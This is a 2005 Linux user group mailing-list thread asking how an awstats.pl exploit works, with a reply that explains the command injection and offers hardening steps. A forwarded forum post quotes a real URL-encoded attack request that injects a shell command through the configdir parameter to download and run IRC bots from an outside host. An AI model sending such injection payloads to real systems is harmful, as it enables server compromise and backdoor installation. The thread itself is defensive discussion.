[TriLUG] How does this exploit work?

Steve Hoffman srhoffman at gmail.com
Fri Aug 12 14:40:20 EDT 2005


The flaw comes from awstast perl file running system commands.   Our
system got hit by it a few months ago...I could see in the http logs
these requests that basically ran simple commands like uname -a or
similar...then downloaded a file to /tmp or /var/tmp...execute that
file which was nothing more then a back door into your system that ran
over an IRC port or something.  some of it was perl code other was
compiled c/c++.

I've since moved the location of the awstats aliases to
/site_statistics/ since they search for awstats in the traditional
locations and also password protected said directory with .htaccess
and chrooted apache.  They say that newer versions are not susceptible
to the attack, but I was able to get it to work on 6.3 and 6.4 by
mixing up the commands a little.

If you're that worried about it, awstats can generate the html your
browser would see and write it to a web directory via cron...in that
case there's no cgi necessary...although I don't expect you'd have the
ability to check previous months stats.

I couldn't really blame apache because I explicitly allowed cgi
execution (required for awstats to run).  I can't find anything as
customizable or easy to use (and free) so I just secure it as best I
can and go from there.

I'm no pro on this part, but the way I see it is that awstats is
allowed to call other executable files and modules to display your
page.  I think this exploit is quite similar to sql injection whereby
you are escaping expected input and running your own command..

Steve

On 8/12/05, Rick DeNatale <rick.denatale at gmail.com> wrote:
> This appeared on the awstats discussion list.  I'm curious as to where
> the security hole lies here.  Is it in awstats or in apache?
> 
> If I am decoding this correctly, the exploit feeds a shell command
> starting with a pipe character to awstats.pl as the config parameter.
> My question is, which software actually interprets this as a shell
> command to be executed? I think that it must be apache since awstats
> seems to take the parameter as a filename string and looks for a
> filename and then open it and parse the contents.
> 
> 
> ---------- Forwarded message ----------
> From: SourceForge.net <noreply at sourceforge.net>
> Date: Aug 12, 2005 6:39 AM
> Subject: [awstats - Open Discussion] RE: hacking
> To: noreply at sourceforge.net
> 
> 
> 
> Read and respond to this message at:
> https://sourceforge.net/forum/message.php?msg_id=3291408
> By: nobody
> 
> awstats.pl can be used to drop IRC-Bots using the "configdir" argument.
> 
> I just discovered so.
> "GET //cgi-bin/awstats.pl?configdir=%7cecho%20%3becho%20b_exp%3bcd%20%2ftmp%3bwg
> et%20www%2eirc%2dbots%2eorg%2f
> x%2etar%2egz%3btar%20xvzf%20x%2etar%2egz%3bcd%20x%3b%2e%2fcrond%3becho%20e_exp%3
> b%2500 HTTP/1.1"
> 
> ______________________________________________________________________
> You are receiving this email because you elected to monitor this forum.
> To stop monitoring this forum, login to SourceForge.net and visit:
> https://sourceforge.net/forum/unmonitor.php?forum_id=43428
> --
> TriLUG mailing list        : http://www.trilug.org/mailman/listinfo/trilug
> TriLUG Organizational FAQ  : http://trilug.org/faq/
> TriLUG Member Services FAQ : http://members.trilug.org/services_faq/
> TriLUG PGP Keyring         : http://trilug.org/~chrish/trilug.asc
>



More information about the TriLUG mailing list